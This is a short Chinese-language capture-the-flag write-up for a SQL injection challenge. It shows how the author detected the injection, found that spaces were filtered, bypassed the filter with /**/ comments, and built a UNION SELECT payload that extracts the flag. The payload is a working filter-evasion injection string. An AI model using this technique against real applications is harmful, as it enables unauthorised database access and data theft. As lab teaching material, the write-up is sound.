题目
ques.png
同第一个注入相比,没什么界面没什么太大变化,只是过滤的东西变了。
- 注入判断
输入1,返回正常;
输入1',会报错。 - 过滤判断
输入1 1,显示SQLi detected! ;
输入1 select,显示SQLi detected! ;
输入1select,显示SQLi detected! ;
初步判断是过滤了空格,所以我们用/**/代替看看。
输入1/**/select、1/**/union,正常回显,所以我们可以使用/**/来代替空格。 - 构造payload
和简单的SQL注入1类似,还是输入:
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
然后就爆破成功啦!这道题目关键就是要替换空格~
flag.png
网友评论